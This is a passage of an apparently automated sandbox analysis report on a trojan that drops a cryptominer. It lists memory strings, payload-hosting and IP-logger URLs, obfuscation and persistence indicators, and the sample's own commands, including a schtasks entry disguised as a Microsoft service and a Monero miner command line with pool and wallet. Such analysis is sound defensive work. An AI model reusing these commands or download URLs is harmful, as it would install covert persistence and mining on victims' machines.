              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com/dance.exed
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com/mex.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com4
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.comD8
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: https://d.symcb.com/cps0%
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: https://d.symcb.com/rpa0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: https://d.symcb.com/rpa0.
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278531237.00000000002E2000.00000020.00020000.sdmp, SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1r2et7
              Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmpString found in binary or memory: https://iplogger.org/1tsef7
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/WmBNYXYN
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/bnxCb5RP
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278531237.00000000002E2000.00000020.00020000.sdmpString found in binary or memory: https://pastebin.com/raw/bnxCb5RPChttps://pastebin.com/raw/WmBNYXYN
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283839555.00000000032C8000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com4
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.comD8
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283801731.00000000032C0000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: pg2bsuqa.exe.0.drString found in binary or memory: https://sectigo.com/CPS0D
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: https://www.digicert.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49730 version: TLS 1.2

              System Summary:

              barindex
              PE file contains section with special charsShow sources
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: section name:
              Source: pg2bsuqa.exe.0.drStatic PE information: section name:
              Source: pg2bsuqa.exe.0.drStatic PE information: section name:
              Source: pg2bsuqa.exe.0.drStatic PE information: section name:
              Source: zmql3v0y.exe.0.drStatic PE information: section name:
              Source: zmql3v0y.exe.0.drStatic PE information: section name:
              Source: zmql3v0y.exe.0.drStatic PE information: section name:
              Source: RantimeBroker.exe.6.drStatic PE information: section name:
              Source: RantimeBroker.exe.6.drStatic PE information: section name:
              Source: RantimeBroker.exe.6.drStatic PE information: section name:
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeFile created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sysJump to behavior
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeCode function: 4_2_003D1D304_2_003D1D30
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeCode function: 4_2_003D49284_2_003D4928
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\pg2bsuqa.exe 1D1F06C0D0965296755770B3F6A70A90E0D21A57EF5E47F9A26FCC4008AD45EF
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\zmql3v0y.exe 83F953427624EABA72E6D34339B4004C3614657BFE9FB601ECA7E76410B71325
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: invalid certificate
              Source: pg2bsuqa.exe.0.drStatic PE information: Number of sections : 11 > 10
              Source: cpu.exe.6.drStatic PE information: Number of sections : 13 > 10
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: pg2bsuqa.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeBinary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000003.237103950.0000000000F40000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLoader.exe, vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284646419.0000000006030000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.285071162.0000000006340000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.285071162.0000000006340000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280825476.0000000001100000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeBinary or memory string: OriginalFilenameLoader.exe, vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
              Source: 00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
              Source: 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
              Source: Process Memory Space: RantimeBroker.exe PID: 6552, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: Section: ZLIB complexity 0.989800347222
              Source: WinRing0x64.sys.6.drBinary string: \Device\WinRing0_1_2_0
              Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@13/9@9/5
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile created: C:\Users\user\AppData\Local\pg2bsuqa.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_01
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeMutant created: \Sessions\1\BaseNamedObjects\3d8f939a-7191-48a7-9jo8-2cc28dtec736
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeMetadefender: Detection: 21%
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeReversingLabs: Detection: 28%
              Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe'
              Source: unknownProcess created: C:\Users\user\AppData\Local\pg2bsuqa.exe 'C:\Users\user\AppData\Local\pg2bsuqa.exe'
              Source: unknownProcess created: C:\Users\user\AppData\Local\zmql3v0y.exe 'C:\Users\user\AppData\Local\zmql3v0y.exe'
              Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
              Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess created: C:\Users\user\AppData\Local\pg2bsuqa.exe 'C:\Users\user\AppData\Local\pg2bsuqa.exe' Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess created: C:\Users\user\AppData\Local\zmql3v0y.exe 'C:\Users\user\AppData\Local\zmql3v0y.exe' Jump to behavior
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /fJump to behavior
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32Jump to behavior
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic file information: File size 2817248 > 1048576
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x2a7200
              Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278594567.00000000002F0000.00000040.00020000.sdmp, zmql3v0y.exe, 00000006.00000002.520873342.0000000000B40000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000F.00000002.319896827.0000000000D90000.00000040.00020000.sdmp
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.6.dr

              Data Obfuscation:

              barindex
              Detected unpacking (changes PE section rights)Show sources
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeUnpacked PE file: 0.2.SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe.2e0000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeUnpacked PE file: 6.2.zmql3v0y.exe.b30000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeUnpacked PE file: 15.2.RantimeBroker.exe.d80000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
              Binary contains a suspicious time stampShow sources
              Source: initial sampleStatic PE information: 0xEEB543EE [Tue Nov 27 12:13:34 2096 UTC]
              Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
              Source: zmql3v0y.exe.0.drStatic PE information: real checksum: 0x280d9c should be: 0x285c9a
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: real checksum: 0x2b2b3a should be: 0x2b9e3b
              Source: RantimeBroker.exe.6.drStatic PE information: real checksum: 0x280d9c should be: 0x285c9a
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: section name:
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: section name: .themida
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: section name: .boot
              Source: pg2bsuqa.exe.0.drStatic PE information: section name:
              Source: pg2bsuqa.exe.0.drStatic PE information: section name:
              Source: pg2bsuqa.exe.0.drStatic PE information: section name:
              Source: pg2bsuqa.exe.0.drStatic PE information: section name: .apk0
              Source: pg2bsuqa.exe.0.drStatic PE information: section name: .themida
              Source: pg2bsuqa.exe.0.drStatic PE information: section name: .boot
              Source: pg2bsuqa.exe.0.drStatic PE information: section name: .apk1
              Source: pg2bsuqa.exe.0.drStatic PE information: section name: .apk2
              Source: zmql3v0y.exe.0.drStatic PE information: section name:
              Source: zmql3v0y.exe.0.drStatic PE information: section name:
              Source: zmql3v0y.exe.0.drStatic PE information: section name:
              Source: zmql3v0y.exe.0.drStatic PE information: section name: .themida
              Source: zmql3v0y.exe.0.drStatic PE information: section name: .boot
              Source: RantimeBroker.exe.6.drStatic PE information: section name:
              Source: RantimeBroker.exe.6.drStatic PE information: section name:
              Source: RantimeBroker.exe.6.drStatic PE information: section name:
              Source: RantimeBroker.exe.6.drStatic PE information: section name: .themida
              Source: RantimeBroker.exe.6.drStatic PE information: section name: .boot
              Source: cpu.exe.6.drStatic PE information: section name: _RANDOMX
              Source: cpu.exe.6.drStatic PE information: section name: _SHA3_25
              Source: cpu.exe.6.drStatic PE information: section name: _TEXT_CN
              Source: cpu.exe.6.drStatic PE information: section name: _TEXT_CN
              Source: cpu.exe.6.drStatic PE information: section name: _RDATA
              Source: cpu.exe.6.drStatic PE information: section name: 0
              Source: cpu.exe.6.drStatic PE information: section name: 1
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeCode function: 4_2_003D8570 push ecx; ret 4_2_003D8585
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeCode function: 15_2_03CA0007 push es; retf 0003h15_2_03CA001E
              Source: initial sampleStatic PE information: section name: entropy: 7.58163620158
              Source: initial sampleStatic PE information: section name: entropy: 7.89210158409
              Source: initial sampleStatic PE information: section name: entropy: 7.89210158409

              Persistence and Installation Behavior:

              barindex
              Sample is not signed and drops a device driverShow sources
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeFile created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sysJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile created: C:\Users\user\AppData\Local\zmql3v0y.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeFile created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeFile created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sysJump to dropped file
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeFile created: C:\Users\user\AppData\Local\pg2bsuqa.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeFile created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeJump to dropped file

              Boot Survival:

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
              Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeProcess information set: NOOPENFILEERRORBOX